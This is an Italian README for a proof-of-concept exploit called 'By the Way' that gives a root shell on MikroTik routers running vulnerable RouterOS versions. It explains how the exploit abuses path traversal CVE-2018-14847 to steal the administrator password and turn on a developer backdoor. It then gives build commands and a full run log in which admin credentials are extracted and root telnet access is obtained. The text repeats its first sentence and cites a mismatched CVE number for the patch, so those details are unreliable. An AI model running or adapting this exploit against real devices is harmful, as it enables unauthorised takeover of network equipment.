
By the Way è un exploit che abilita una shell di root su dispositivi Mikrotik che eseguono versioni di RouterOS:
By the Way è un exploit che consente di ottenere una shell di root su dispositivi Mikrotik con versioni RouterOS:
L'exploit sfrutta la vulnerabilità di path traversal CVE-2018-14847 per estrarre la password dell'amministratore e creare un pacchetto "option" per abilitare il backdoor dello sviluppatore. Dopo lo sfruttamento, l'attaccante può connettersi via Telnet o SSH usando l'utente root "devel" con la password dell'amministratore.
Mikrotik ha corretto CVE-2018-14848 ad aprile. Tuttavia, fino alla scrittura di questo PoC, non credo sia stato divulgato pubblicamente che l'attacco possa essere sfruttato per scrivere file. Puoi trovare il bollettino di Mikrotik qui:
Nota: mentre questo exploit è scritto per Winbox, potrebbe essere portato su HTTP purché si abbiano conoscenze preliminari delle credenziali dell'amministratore.
Questo PoC si basa su:
mkdir build
cd build
cmake ..
make
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password:
Login failed, incorrect username or password
Connection closed by foreign host.
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251
╔╗ ┬ ┬ ┌┬┐┬ ┬┌─┐ ╦ ╦┌─┐┬ ┬
╠╩╗└┬┘ │ ├─┤├┤ ║║║├─┤└┬┘
╚═╝ ┴ ┴ ┴ ┴└─┘ ╚╩╝┴ ┴ ┴
[+] Extracting passwords from 192.168.1.251:8291
[+] Searching for administrator credentials
[+] Using credentials - admin:lol
[+] Creating /pckg/option on 192.168.1.251:8291
[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291
[+] There's a light on
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password:
BusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
# uname -a
Linux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown
# cat /rw/logs/VERSION
v6.38.4 Mar/08/2017 09:26:17
# Connection closed by foreign host.